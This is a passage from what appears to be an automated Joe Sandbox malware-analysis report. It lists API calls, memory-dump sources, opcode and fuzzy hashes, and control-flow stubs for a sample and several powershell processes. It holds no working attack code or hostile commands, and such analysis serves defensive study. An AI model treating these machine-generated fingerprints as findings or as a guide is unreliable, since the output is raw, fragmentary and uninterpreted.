                                          • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                                          • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                                          • HeapFree.KERNEL32(00000000,?), ref: 00416187
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocHeap$FreeVirtual
                                          • String ID:
                                          • API String ID: 3499195154-0
                                          • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                          • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                                          • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                          • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004156E1(void* __eax) {
                                          				void* _t1;
                                          
                                          				_t1 = __eax;
                                          				InitializeCriticalSection( *0x42078c);
                                          				InitializeCriticalSection( *0x42077c);
                                          				InitializeCriticalSection( *0x42076c);
                                          				InitializeCriticalSection( *0x42074c);
                                          				return _t1;
                                          			}





                                          APIs
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                          • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                                          • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                          • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.417146485.00007FFBAD3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffbad3d0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                          • Instruction ID: b150de9753e37189d2d7271707c55ef80b92bd0e6902882702c0f619bd1e5774
                                          • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                          • Instruction Fuzzy Hash: F501677111CB0C8FD744EF0CE451AA6B7E0FB99324F10056DE58AC3651DA36E882CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12.1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:42
                                          Total number of Limit Nodes:2
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 969eb92d4bf19aaf83dd677a4de0de470fd734a7f6cfaf552103bf951e7c9b2a
                                          • Instruction ID: 1a354e493672c97fe9e78bc15a25d38d7fe18aeb3f08dfb86a1fc56c692e86c8
                                          • Opcode Fuzzy Hash: 969eb92d4bf19aaf83dd677a4de0de470fd734a7f6cfaf552103bf951e7c9b2a
                                          • Instruction Fuzzy Hash: BA525A34A1020ADFDB55DF64C890BAA77B2BF89304F1485A9D909AB390DB35ED85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bfd7cbb41026f2860f719e187441a55a4d98e6b321e4456e83cb401387440f3
                                          • Instruction ID: 309cf90f96b390b9ce5cfe32e8d28360a5cde5bfb056c095bc894ad9afe23d8a
                                          • Opcode Fuzzy Hash: 5bfd7cbb41026f2860f719e187441a55a4d98e6b321e4456e83cb401387440f3
                                          • Instruction Fuzzy Hash: 4502BE34E1030A9FDB14DF66C454AAEBBB2EF84304F148969E8059B794DB75E8C6CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hr0k$Hr0k$Hr0k$Hr0k$Hr0k$Hr0k
                                          • API String ID: 0-2721006579
                                          • Opcode ID: 3a4865eb6a7d289d818ed155c7ad3e632369b12eb507520495279a07e0810861
                                          • Instruction ID: de2c0bebd6edc54aba27d95f947317c3a7e0102ebdd80a1bc6cd9c9afd5a2600
                                          • Opcode Fuzzy Hash: 3a4865eb6a7d289d818ed155c7ad3e632369b12eb507520495279a07e0810861
                                          • Instruction Fuzzy Hash: A4916034A102099FD744DF69C490AAEBBF2EF89314F04C968E8199B751CB75ED86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hr0k$Hr0k$Hr0k$Hr0k$Hr0k$Hr0k
                                          • API String ID: 0-2721006579
                                          • Opcode ID: 9bf75116dc5fe1bd8e9de9e1b4395e318a1a541e81a143f1b435f0698494b6a1
                                          • Instruction ID: c4d5781c5a0d638ac7a5da30bd38be74e60e4f735dcecacb212000b54de88011
                                          • Opcode Fuzzy Hash: 9bf75116dc5fe1bd8e9de9e1b4395e318a1a541e81a143f1b435f0698494b6a1
                                          • Instruction Fuzzy Hash: 2B918034A102099FC744DF69C490AADBBF2EF89314F04C968E8199B751CB71ED86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 47ba15e17b3e93423e9d1abf32c3d691c1605d30ff09d6258c44d41876287445
                                          • Instruction ID: 4fcfc2f65dd250a957bf5e7d73622d6122443d5035f1376b3a52765a5816a325
                                          • Opcode Fuzzy Hash: 47ba15e17b3e93423e9d1abf32c3d691c1605d30ff09d6258c44d41876287445
                                          • Instruction Fuzzy Hash: 9BE12F38A10209CFCB54DFA9C49499DB7F2FF88314B1589A9E8069B365DB70ED46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1923 2e43fec-2e456a2 1926 2e456a4-2e456a7 1923->1926 1927 2e456aa-2e456d5 GetFileAttributesW 1923->1927 1926->1927 1928 2e456d7-2e456dd 1927->1928 1929 2e456de-2e456fb 1927->1929 1928->1929
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000), ref: 02E456C8
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.442876524.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_2e40000_powershell.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: c02c5fd9583ad30aa67d8d1b919ab18cbe416cb52aede10f6ec2e8d5fff088f0
                                          • Instruction ID: 668febf1aa13cec84a6f67e50049c3817af2c89fd984feb40e181a959c01c58a
                                          • Opcode Fuzzy Hash: c02c5fd9583ad30aa67d8d1b919ab18cbe416cb52aede10f6ec2e8d5fff088f0
                                          • Instruction Fuzzy Hash: 242124B1D006199BCB10CF99E4447EEFBB4EB48214F10855AD819A3B00D774A904CFE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1932 2e45650-2e456a2 1935 2e456a4-2e456a7 1932->1935 1936 2e456aa-2e456d5 GetFileAttributesW 1932->1936 1935->1936 1937 2e456d7-2e456dd 1936->1937 1938 2e456de-2e456fb 1936->1938 1937->1938
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000), ref: 02E456C8
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.442876524.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_2e40000_powershell.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 96656ff2fa19255658339ae5f3d0a68cc0c695a9294ac29d9955c4aeeb07c77a
                                          • Instruction ID: 1b6a2bd8f44a9cedad3c1058d83cba756d27b4687dbb541a78cd7d2651bfa4c8
                                          • Opcode Fuzzy Hash: 96656ff2fa19255658339ae5f3d0a68cc0c695a9294ac29d9955c4aeeb07c77a
                                          • Instruction Fuzzy Hash: 841167B1D002199BCB00CFAAE4457DEFBB4FB48314F10855AD818B3B00D734AA55CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pi0k
                                          • API String ID: 0-140181772
                                          • Opcode ID: 45d93d429fc8d91fca0e78a658858553b2670f4584ec58af597b00decb0ab87e
                                          • Instruction ID: 232c908523c628e77ab5c88f6d767bc14513d9a2517539b1ed38e3c45877d15f
                                          • Opcode Fuzzy Hash: 45d93d429fc8d91fca0e78a658858553b2670f4584ec58af597b00decb0ab87e
                                          • Instruction Fuzzy Hash: BE515B74A206059FDB54DF75D498BADBBF2BF88304F109469E806AB3A0DB74EC85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pi0k
                                          • API String ID: 0-140181772
                                          • Opcode ID: 0bc855d5737a993cc51a6130c527c749826ff62da610255b2445a9ad8765dec2
                                          • Instruction ID: f2db7d29ffc318ede028ce2508157d3f0bccfa82444150c2f42bfc19ece0b46e
                                          • Opcode Fuzzy Hash: 0bc855d5737a993cc51a6130c527c749826ff62da610255b2445a9ad8765dec2
                                          • Instruction Fuzzy Hash: EE516B74A206059FDB54DF75D498BADBBF2BF88304F109469E806AB3A0DB35EC85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 3
                                          • API String ID: 0-1842515611
                                          • Opcode ID: 1bbbb1dd198941ae05533706521b8070c2c7fe1e91a55a8b2e22c0d6d46bf461
                                          • Instruction ID: 46aea7a145b6ed137cace92432317291814279c477a6a127b151ded431365052
                                          • Opcode Fuzzy Hash: 1bbbb1dd198941ae05533706521b8070c2c7fe1e91a55a8b2e22c0d6d46bf461
                                          • Instruction Fuzzy Hash: 2C01DD6090D7C09FD343DB78D82069D7FB29F43215F5985EAD84DCB2A2DA341E05DB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b17ad2ef8baa53d4bcae0f336668b9f78142bd26b87e4289dd6977217dc257a4
                                          • Instruction ID: cde5bcbab4fd673c3424e69fc6b71e7024af5b0df00a5d10fba89d92cde7edab
                                          • Opcode Fuzzy Hash: b17ad2ef8baa53d4bcae0f336668b9f78142bd26b87e4289dd6977217dc257a4
                                          • Instruction Fuzzy Hash: 62417E39700208EFDB16AB70D4A5A7E3AB3EFC8344F504558EE069B394DF35AD468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94163e1186e40e4740b9875a654ae0ac1acdc037fac25d262e3e8360f729c63d
                                          • Instruction ID: 23b294aa4c95c3592bc3ac04c175b4fe46fdb62ed1ac427da750a7a402315d52
                                          • Opcode Fuzzy Hash: 94163e1186e40e4740b9875a654ae0ac1acdc037fac25d262e3e8360f729c63d
                                          • Instruction Fuzzy Hash: 2E311535B102189FDB65AA3994143BE76E6DF81344F0488BAE809DB384DF79DD81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 863da2ebe4bfec45c993066f151dba8efa37a3e877a1055ef7951f60ffb441a5
                                          • Instruction ID: 30f712f32d39a40ccfaae8306d4975d9cd414fc633149e9c075a0f76425fb3fb
                                          • Opcode Fuzzy Hash: 863da2ebe4bfec45c993066f151dba8efa37a3e877a1055ef7951f60ffb441a5
                                          • Instruction Fuzzy Hash: 36417575B001099FDB44DFA9D994BAEB7F2EFC5314F1080A9E809AB390DB34AD42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9170efd6a3cc49f19fabf6a4edef5de12eab1633741dc1db7662640d6b502f6
                                          • Instruction ID: b7acfaee672243df0c2337c871aed27412480472f47a55b2ef871a3e2e5c02f1
                                          • Opcode Fuzzy Hash: f9170efd6a3cc49f19fabf6a4edef5de12eab1633741dc1db7662640d6b502f6
                                          • Instruction Fuzzy Hash: 06418175E202159FDB54CF6AD5402EEBBF1AF88364F049076EC05E7250E7798D81CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42b9ffd24f8ecc5d3ba1f4a325cc96e1e1f788f84d410e4b7dd56f23dd4a9985
                                          • Instruction ID: 32555a7beae75d624a0d69595358e91ed3fcc34ec4e6356ad2dacfa627d0f9dc
                                          • Opcode Fuzzy Hash: 42b9ffd24f8ecc5d3ba1f4a325cc96e1e1f788f84d410e4b7dd56f23dd4a9985
                                          • Instruction Fuzzy Hash: 1941F331E1021ADFCB05CFB5D894A9DBBB2FF85304F14855AE805AB291DF70AC86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed900bc7f041e0bb647bf551432a075041265f2bed2566e845b8995ea99f8984
                                          • Instruction ID: 53703f5a339521365c9037ac191da462c120643f7993a69fbc605a38feedd91d
                                          • Opcode Fuzzy Hash: ed900bc7f041e0bb647bf551432a075041265f2bed2566e845b8995ea99f8984
                                          • Instruction Fuzzy Hash: 46414F34A0060CAFDB04EFA5D8A0B9DB7B7FB88304F1085A9DC16A7795DB35A945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 007a031e1e5b421fc1702dce1d2fc83828388f596b78b1421a05986485ac0839
                                          • Instruction ID: 7b6b3eff56540e3ad1defb514fc9062e599d4fe7586c0dfcd3a9af6547c01713
                                          • Opcode Fuzzy Hash: 007a031e1e5b421fc1702dce1d2fc83828388f596b78b1421a05986485ac0839
                                          • Instruction Fuzzy Hash: 1331F13AB202165BD754A626D61177FB2DADFC0398F08C529EC0A87344EF78DD8693E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7faaf3c3e4fefc8526438bada8628f6679fc7dc10cb85f7cfb1bdfea34a3f211
                                          • Instruction ID: cbd1595e95a17717615d131459e70656c01436c2f40a66df6ef59854fa6224b7
                                          • Opcode Fuzzy Hash: 7faaf3c3e4fefc8526438bada8628f6679fc7dc10cb85f7cfb1bdfea34a3f211
                                          • Instruction Fuzzy Hash: CD316234A20209CFCB64DB65D8949ADB7F2FF84314B158868D9429B794DB70FC4ACB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5429390875864bf5391bdf461637b6be9fd2bc19fb66a77aa4427713bea4a6f2
                                          • Instruction ID: 534048dca40466c333557b56bfa6b0257c5dd224ee13e866201b2d6693e8b07c
                                          • Opcode Fuzzy Hash: 5429390875864bf5391bdf461637b6be9fd2bc19fb66a77aa4427713bea4a6f2
                                          • Instruction Fuzzy Hash: 1021C134A206099FD7149A69D494B6FB7A7EFC0328F10C52DD80A5B784DF746C8A8FD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efd99c3ced6ca8c650eeab8855574bc1a60353b5ca2102e831c058b6f0d42eca
                                          • Instruction ID: 1d051ab8c76f47b6072b8a12bf8afc78a67814dda62acf4ab20718ee8c4cdd73
                                          • Opcode Fuzzy Hash: efd99c3ced6ca8c650eeab8855574bc1a60353b5ca2102e831c058b6f0d42eca
                                          • Instruction Fuzzy Hash: 6A2130302105099BCB40EBA8D8A49AD77A7DFC53183848DA8C51D8F768DF61AD1F8FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08c691248598dac3a766b6f4b2f444e72092c6839b027e5b43d84a1ba003fd9c
                                          • Instruction ID: 9222b273423cb3bf4357bee51aaf729458d611fa8a25f8da7cb2d6c7f126ea1d
                                          • Opcode Fuzzy Hash: 08c691248598dac3a766b6f4b2f444e72092c6839b027e5b43d84a1ba003fd9c
                                          • Instruction Fuzzy Hash: 79115139F216165BE7645626922137FA1968B8079DF04C12AEC0687384EBBDCA8593E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f22f3bebedd78062a09c72ec526d240c7a75206e022e46a29c51eb29b3e0a542
                                          • Instruction ID: e7eb8d59847a244e4e298e5e700a55febb7938bd307843b9af6c5fa7b6c98125
                                          • Opcode Fuzzy Hash: f22f3bebedd78062a09c72ec526d240c7a75206e022e46a29c51eb29b3e0a542
                                          • Instruction Fuzzy Hash: 5D213A31A053541BD3019B68DC66BEF7F619F42704F588476E4459F7C2CB24884AC7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 729b770b85114dfd1244c55f8d010a5f3c19f1fe215ceec9983da78dfc8f21bb
                                          • Instruction ID: a725437a9412bd2df8861e7dbecc08c986bcea85f47ffc5a43fa3b2f24568bac
                                          • Opcode Fuzzy Hash: 729b770b85114dfd1244c55f8d010a5f3c19f1fe215ceec9983da78dfc8f21bb
                                          • Instruction Fuzzy Hash: 04219235B102088FDB149B65D968ABEBBF6EF88315F10886AEA06E7390DF715D00CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 458bb724cd6212b2fc3b4792394d3e2a52eac5ba54d30a85eca1f572c96d853e
                                          • Instruction ID: e12b925b3e8d085b1934e6dd14d4c595943c5d384ce5a1d06fcd42302972698c
                                          • Opcode Fuzzy Hash: 458bb724cd6212b2fc3b4792394d3e2a52eac5ba54d30a85eca1f572c96d853e
                                          • Instruction Fuzzy Hash: B0215C74A11216CFEB68CF19C858FA9B7F1FF44304F0085A9D909A72A4DB749A85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14a84ea03ca8a9618807ee4e5e1e9f0442142fff59f33eae0f8343cfa38367c0
                                          • Instruction ID: 4a2da274bc2d0b74ed5d52195b5ad326d4d37974296ea65b24d4984dd933d1ec
                                          • Opcode Fuzzy Hash: 14a84ea03ca8a9618807ee4e5e1e9f0442142fff59f33eae0f8343cfa38367c0
                                          • Instruction Fuzzy Hash: 6B211D34B112048FDB04DB75C45AAAD7BB2AF8C305F148469E512B73A0CF759C4ADB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39b71cde0418f802ef474bbd53f2742e61ad2452d26b44ced26207c5c9a35b80
                                          • Instruction ID: b1ad7a1d340ef6bb1322ad22d025dc2a3089286c7b13b30742ad798827de9e18
                                          • Opcode Fuzzy Hash: 39b71cde0418f802ef474bbd53f2742e61ad2452d26b44ced26207c5c9a35b80
                                          • Instruction Fuzzy Hash: 8F11D331E206169FDB58DF7AC5412BEBBF6AF89254F10902AD805E7340E7348D41CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6158c7a55fec335c7eb524789f3388d4904d5495ff27aedc30d7b2137a6c4c3b
                                          • Instruction ID: 2f58a5275b508278b179a444874bf023ec721324b46c22f3f7b9d78f18d6b01b
                                          • Opcode Fuzzy Hash: 6158c7a55fec335c7eb524789f3388d4904d5495ff27aedc30d7b2137a6c4c3b
                                          • Instruction Fuzzy Hash: E32129347002098FDB01EF64D8A56AEBBB3EFC4308F148429D815AB75ADF759C4A8B91
